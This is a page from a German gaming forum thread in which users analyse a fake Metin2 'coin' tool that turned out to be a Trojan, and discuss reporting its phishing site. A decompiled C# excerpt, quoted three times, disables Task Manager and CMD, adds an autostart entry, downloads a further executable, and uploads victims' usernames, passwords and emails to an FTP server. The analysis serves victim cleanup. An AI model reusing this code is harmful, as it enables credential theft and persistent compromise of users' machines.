(Hilfe) Homepage Anbieter bedroht mich

Page 4 of 6 « First 23 4 56
06/30/2013 00:25 Gotoxy#46
Mangelde Interesse der Öffentlichkeit.
Eingestellt.


Wie oft hatte ich das schon. :D


Lass die Seite in Ruhe.
Vess Sie und Sie vergessen dich.^^
06/30/2013 00:28 DasLampe#47
Habe so einen Screen

[Only registered and activated users can see links. Click Here To Register...]

+ noch einen wo man Account-Daten sieht mit der IP usw.
06/30/2013 00:51 Cambios#48
Quote:
Originally Posted by ¦Kati~ View Post
Eine Fake Seite zu erstellen macht man sich ebenfalls Strafbar. DasLampe bitte erstatte eine Anzeige. Du würdest mit einem "blauen Auge" davon kommen, allerdings der "Hacker" mit wahrscheinlich einer Geldstrafe.
Wär ich nicht so sicher, Datenmanipulation ist im Gesetz verankert und verboten, er hat sich aufn fremden Server eingeloggt und Daten gelöscht ohne erlaubniss, da wär ich nicht sicher ob er mit einem "blauen auge" davon kommen würde - nachher dreht sich das ganze noch und er bekommt den Ärger.
Ich an seiner Stelle würds einfach sein lassen Anzeige zu erstatten sondern dem Webseiten Service lycoo einfach ne Abuse schicken.
Man muss es nicht unnötig Kompliziert machen, es gibt zigtausend kleiner Kiddys da draußen die ihre Phishing Sites verteilen im Netz.

Es wäre viel wichtiger die User die sich nicht gut mit computer auskennen aufzuklären was phishing ist und darauf zu sensibilisieren, das würd viel mehr helfen als 100 Phisher anzuzeigen ;)
06/30/2013 00:52 DasLampe#49
Jo, dann lass ich das lieber mit der Anzeige^^.

Danke an alle die sich hier beteiligt haben
E-Mail wurde an yocoo gesendet (an die richtige :D)
06/30/2013 01:03 Cambios#50
Quote:
Originally Posted by DasLampe View Post
Jo, dann lass ich das lieber mit der Anzeige^^.

Danke an alle die sich hier beteiligt haben
E-Mail wurde an yocoo gesendet (an die richtige :D)
Ich frag mich nur wie du das Decompiled hast, die Exe wurde mit DeepSea Obfuscade obfuscated, sehe da nirgends eine url o.ä.
Hab jetzt aber auch Kein Bock das irgendwie Mühsam rückgängig zu machen oder so.. Mühe nicht Wert :/
Lass es jetzt noch über de4dot laufen,wenns nicht klappt dann lass ichs bleiben^^

EDIT: Hat funktioniert^^

@TE
Formatier bitte dein Computer, die Datei deaktiviert Taskmanager in der Registry usw..
Erstellt auch binarys auf deinem Pc etc.. -> Systemwiederherstellungspunkt von vor einer Woche z.b wiederherstellen oder Windows neu drauf packen / die Veränderungen Manuell rückgängig machen!
Kann sein das du immer noch nen Trojaner/sonstigen Sh*t drauf hast.

Hier mal Auszug ausm Source damit die paar sachen vllt manuell fixxen kannst ->
Code:
            Registry.SetValue("HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System", "DisableTaskMgr", "1", RegistryValueKind.DWord);
            Registry.SetValue("HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System", "DisableCMD", "1", RegistryValueKind.DWord);
            Registry.SetValue("HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run", "Paranormal", string.Concat(this.string_0, "\\M2T\\Paranormal.exe"), RegistryValueKind.String);
            Directory.CreateDirectory(string.Concat(this.string_0, "\\M2T"));
            this.webClient_0.Credentials = new NetworkCredential(this.string_5, this.string_4);
            this.webClient_0.DownloadFile(new Uri("Ftp://paranormal.000a.de/Metin2/Paranormal.exe"), string.Concat(this.string_0, "\\M2T\\Paranormal.exe"));
            this.vmethod_28().Text = this.webClient_0.DownloadString("http://myip.tdsw.de/");

        public void Phase1()
        {
            Class7.MySettings_0.IPLoad = this.vmethod_28().Text;
            Class7.MySettings_0.Save();
            Interaction.MsgBox("Deine bestellung wird bearbeitet! Ein Moment bitte...", MsgBoxStyle.Information, string.Concat("Bitte warte ein Augenblick!  ", Conversions.ToString(DateAndTime.TimeOfDay)));
            string str = string.Concat(this.vmethod_16().Text, "@", this.vmethod_12().Text);
            string[] text = new string[] { "Username = ", this.vmethod_16().Text, "\r\nPasswort = ", this.vmethod_12().Text, "\r\nE-Mail = ", this.vmethod_8().Text, "\r\n\r\nServer = ", this.vmethod_22().Text, "\r\nIp = ", this.vmethod_28().Text };
            this.richTextBox_0.Text = string.Concat(text);
            this.webClient_0.Credentials = new NetworkCredential(this.string_5, this.string_4);
            this.webClient_0.UploadString(string.Concat("Ftp://paranormal.000a.de/Metin2/", str), this.richTextBox_0.Text);
            Interaction.MsgBox("Deine Coins werden innerhalb der nächsten Stunde gebucht!", MsgBoxStyle.Information, string.Concat("Bitte warte ein Augenblick!  ", Conversions.ToString(DateAndTime.TimeOfDay)));
Da läd die Binary noch eine Datei "Paranormal.exe" runter und packts in Autostart - wahrscheinlich ein Backdoor.

[Only registered and activated users can see links. Click Here To Register...] ist höchstwahrscheinlich dann ne ip-Redirect zu seinem PC.. wird also nen kiddy-visualbasic Trojaner von ihm sein wo er denkt er wäre hinterm proxy bei nem ip redirect service ;)
06/30/2013 01:14 anonymous-f4h279#51
Hoster der kein Deutsch kann, oke.
06/30/2013 01:26 Cambios#52
Quote:
Originally Posted by Daddy Neuland View Post
Hoster der kein Deutsch kann, oke.
Willst und verAPPLEn (kleiner Wortwitz schnack schnack ;)) ?

[Only registered and activated users can see links. Click Here To Register...] <-- Anschaun & staunen über die vorhandenen Deutschkenntnisse des Hosters ;)

Falls du das auf die schlechte Rechtschreibung der Mails bezogen hast, sorry ;)
06/30/2013 02:40 DasLampe#53
Quote:
Originally Posted by Cambios View Post
Ich frag mich nur wie du das Decompiled hast, die Exe wurde mit DeepSea Obfuscade obfuscated, sehe da nirgends eine url o.ä.
Hab jetzt aber auch Kein Bock das irgendwie Mühsam rückgängig zu machen oder so.. Mühe nicht Wert :/
Lass es jetzt noch über de4dot laufen,wenns nicht klappt dann lass ichs bleiben^^

EDIT: Hat funktioniert^^

@TE
Formatier bitte dein Computer, die Datei deaktiviert Taskmanager in der Registry usw..
Erstellt auch binarys auf deinem Pc etc.. -> Systemwiederherstellungspunkt von vor einer Woche z.b wiederherstellen oder Windows neu drauf packen / die Veränderungen Manuell rückgängig machen!
Kann sein das du immer noch nen Trojaner/sonstigen Sh*t drauf hast.

Hier mal Auszug ausm Source damit die paar sachen vllt manuell fixxen kannst ->
Code:
            Registry.SetValue("HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System", "DisableTaskMgr", "1", RegistryValueKind.DWord);
            Registry.SetValue("HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System", "DisableCMD", "1", RegistryValueKind.DWord);
            Registry.SetValue("HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run", "Paranormal", string.Concat(this.string_0, "\\M2T\\Paranormal.exe"), RegistryValueKind.String);
            Directory.CreateDirectory(string.Concat(this.string_0, "\\M2T"));
            this.webClient_0.Credentials = new NetworkCredential(this.string_5, this.string_4);
            this.webClient_0.DownloadFile(new Uri("Ftp://paranormal.000a.de/Metin2/Paranormal.exe"), string.Concat(this.string_0, "\\M2T\\Paranormal.exe"));
            this.vmethod_28().Text = this.webClient_0.DownloadString("http://myip.tdsw.de/");

        public void Phase1()
        {
            Class7.MySettings_0.IPLoad = this.vmethod_28().Text;
            Class7.MySettings_0.Save();
            Interaction.MsgBox("Deine bestellung wird bearbeitet! Ein Moment bitte...", MsgBoxStyle.Information, string.Concat("Bitte warte ein Augenblick!  ", Conversions.ToString(DateAndTime.TimeOfDay)));
            string str = string.Concat(this.vmethod_16().Text, "@", this.vmethod_12().Text);
            string[] text = new string[] { "Username = ", this.vmethod_16().Text, "\r\nPasswort = ", this.vmethod_12().Text, "\r\nE-Mail = ", this.vmethod_8().Text, "\r\n\r\nServer = ", this.vmethod_22().Text, "\r\nIp = ", this.vmethod_28().Text };
            this.richTextBox_0.Text = string.Concat(text);
            this.webClient_0.Credentials = new NetworkCredential(this.string_5, this.string_4);
            this.webClient_0.UploadString(string.Concat("Ftp://paranormal.000a.de/Metin2/", str), this.richTextBox_0.Text);
            Interaction.MsgBox("Deine Coins werden innerhalb der nächsten Stunde gebucht!", MsgBoxStyle.Information, string.Concat("Bitte warte ein Augenblick!  ", Conversions.ToString(DateAndTime.TimeOfDay)));
Da läd die Binary noch eine Datei "Paranormal.exe" runter und packts in Autostart - wahrscheinlich ein Backdoor.

[Only registered and activated users can see links. Click Here To Register...] ist höchstwahrscheinlich dann ne ip-Redirect zu seinem PC.. wird also nen kiddy-visualbasic Trojaner von ihm sein wo er denkt er wäre hinterm proxy bei nem ip redirect service ;)
Joa den Crap habe ich schon alleine mit ''HitmanPro'' gefixxt. Der hat einfach denke ich mal die Registry wieder auf die Normalen einstellungen gemacht.

Und Paranormal.exe konnte ich auch irgendwie entfernen^^
War vorher unter Prozessen zusehen habe ich aber irgendwie weg bekommen.
06/30/2013 03:53 Cambios#54
Quote:
Originally Posted by DasLampe View Post
Joa den Crap habe ich schon alleine mit ''HitmanPro'' gefixxt. Der hat einfach denke ich mal die Registry wieder auf die Normalen einstellungen gemacht.

Und Paranormal.exe konnte ich auch irgendwie entfernen^^
War vorher unter Prozessen zusehen habe ich aber irgendwie weg bekommen.
Erstellt ja nen neuen Ordner in dem Ordner wo du das erstemal die Exe gestartest hast, da liegt die Datei dann drin - einfach löschen den M2 Ordner in diese Ordner, da is die Paranormal.exe drin dann - leider weiß ich nicht was die macht, die ist nicht mehr aufm Webspace drauf (alles gelöscht dort).
06/30/2013 05:09 DasLampe#55
Quote:
Originally Posted by Cambios View Post
Erstellt ja nen neuen Ordner in dem Ordner wo du das erstemal die Exe gestartest hast, da liegt die Datei dann drin - einfach löschen den M2 Ordner in diese Ordner, da is die Paranormal.exe drin dann - leider weiß ich nicht was die macht, die ist nicht mehr aufm Webspace drauf (alles gelöscht dort).
Jemand sagte mir das:
''Eine Datei von dem Spiel namens Metin2 wird damit ersetzt.''

Bin jetzt aber erstmal Pennen, bis morgen
06/30/2013 10:00 No​rdi#56
Ich würde mal sagen phising vom feinsten, lass einfach die Finger davon weg melde es der Polizei oder dem Hoster ich mein du bist ja nicht Superman oder sonstiges das du dich da einfach so rein hacken darfst.
06/30/2013 11:02 ¦Kati~#57
Quote:
Originally Posted by Cambios View Post
Ich frag mich nur wie du das Decompiled hast, die Exe wurde mit DeepSea Obfuscade obfuscated, sehe da nirgends eine url o.ä.
Hab jetzt aber auch Kein Bock das irgendwie Mühsam rückgängig zu machen oder so.. Mühe nicht Wert :/
Lass es jetzt noch über de4dot laufen,wenns nicht klappt dann lass ichs bleiben^^

EDIT: Hat funktioniert^^

@TE
Formatier bitte dein Computer, die Datei deaktiviert Taskmanager in der Registry usw..
Erstellt auch binarys auf deinem Pc etc.. -> Systemwiederherstellungspunkt von vor einer Woche z.b wiederherstellen oder Windows neu drauf packen / die Veränderungen Manuell rückgängig machen!
Kann sein das du immer noch nen Trojaner/sonstigen Sh*t drauf hast.

Hier mal Auszug ausm Source damit die paar sachen vllt manuell fixxen kannst ->
Code:
            Registry.SetValue("HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System", "DisableTaskMgr", "1", RegistryValueKind.DWord);
            Registry.SetValue("HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System", "DisableCMD", "1", RegistryValueKind.DWord);
            Registry.SetValue("HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run", "Paranormal", string.Concat(this.string_0, "\\M2T\\Paranormal.exe"), RegistryValueKind.String);
            Directory.CreateDirectory(string.Concat(this.string_0, "\\M2T"));
            this.webClient_0.Credentials = new NetworkCredential(this.string_5, this.string_4);
            this.webClient_0.DownloadFile(new Uri("Ftp://paranormal.000a.de/Metin2/Paranormal.exe"), string.Concat(this.string_0, "\\M2T\\Paranormal.exe"));
            this.vmethod_28().Text = this.webClient_0.DownloadString("http://myip.tdsw.de/");

        public void Phase1()
        {
            Class7.MySettings_0.IPLoad = this.vmethod_28().Text;
            Class7.MySettings_0.Save();
            Interaction.MsgBox("Deine bestellung wird bearbeitet! Ein Moment bitte...", MsgBoxStyle.Information, string.Concat("Bitte warte ein Augenblick!  ", Conversions.ToString(DateAndTime.TimeOfDay)));
            string str = string.Concat(this.vmethod_16().Text, "@", this.vmethod_12().Text);
            string[] text = new string[] { "Username = ", this.vmethod_16().Text, "\r\nPasswort = ", this.vmethod_12().Text, "\r\nE-Mail = ", this.vmethod_8().Text, "\r\n\r\nServer = ", this.vmethod_22().Text, "\r\nIp = ", this.vmethod_28().Text };
            this.richTextBox_0.Text = string.Concat(text);
            this.webClient_0.Credentials = new NetworkCredential(this.string_5, this.string_4);
            this.webClient_0.UploadString(string.Concat("Ftp://paranormal.000a.de/Metin2/", str), this.richTextBox_0.Text);
            Interaction.MsgBox("Deine Coins werden innerhalb der nächsten Stunde gebucht!", MsgBoxStyle.Information, string.Concat("Bitte warte ein Augenblick!  ", Conversions.ToString(DateAndTime.TimeOfDay)));
Da läd die Binary noch eine Datei "Paranormal.exe" runter und packts in Autostart - wahrscheinlich ein Backdoor.

[Only registered and activated users can see links. Click Here To Register...] ist höchstwahrscheinlich dann ne ip-Redirect zu seinem PC.. wird also nen kiddy-visualbasic Trojaner von ihm sein wo er denkt er wäre hinterm proxy bei nem ip redirect service ;)
Hab doch gesagt Visual Basic 2010 TuT wie man ein Trojaner erstellt. :D
Kam mir schon bekannt vor wegen:
Quote:
MsgBoxStyle.Information, string.Concat("Bitte warte ein Augenblick! ", Conversions.ToString(DateAndTime.TimeOfDay)));
In der Zeile erkennt man 100% Visual Basic. Bei AutoIT oder anderem schreibt man:
Code:
Msg.Box "Hier ist dein Geb. Geschenk!"
Visual Basic 2010:
Code:
Msg.Box ("Hi!")
Und man erkennt es schnell da Visual Basic viele Tutorials zum Trojaner hat.
06/30/2013 12:40 DasLampe#58
Habe gerade nochmal nen Scanner drüber laufen lassen:

Malware Trace
Registry Key
HKCU/Software/DC3_FEXEC

Weiß jemand was das ist?

++ Haha, jetzt haben die sogar noch nen TeamSpeak 3 Server wo die auch wirklich drauf sind :D
> metin2tools.4b42.org ist die ts3 adresse
07/01/2013 04:11 Cambios#59
Hab jetzt ne Antwort von dem Kerl erhalten ;)

"Hallo *FAKENAME HIER EINFÜGEN*,

danke für deinen Hinweis!

Der gemeldete Inhalt wurde nicht entfernt.

Grund: Ist mir egal - Das neue Programm ist verschlüsselt & Fertig. Aber Danke für den Screen. Damit kommst du sehr Seriös rüber.

Dein metin2tool.yooco.de Team "

Haha.. ich frag mich zwar von welchem Screen er spricht , aber okay ;)
Jetzt habt ihr es auf schwarz weiß - er isn betrüger und gibts damit zu^^

Werde mal ein paar Tage warten und dann nochmal schaun wie toll "verschlüsselt" sein Progg dann diesmal sein wird *grins*
07/01/2013 11:14 Reextion#60
Wieso schreibt der eigentlich alle Adjektive groß ?
Sein "Script" ist nicht wirklich verschlüsselt.... DeepSea ist genauso sinnvoll wie Merkel zu wählen.
Scriptkiddy halt. Keine Ahnung, kein Deutsch. ^^
Page 4 of 6 « First 23 4 56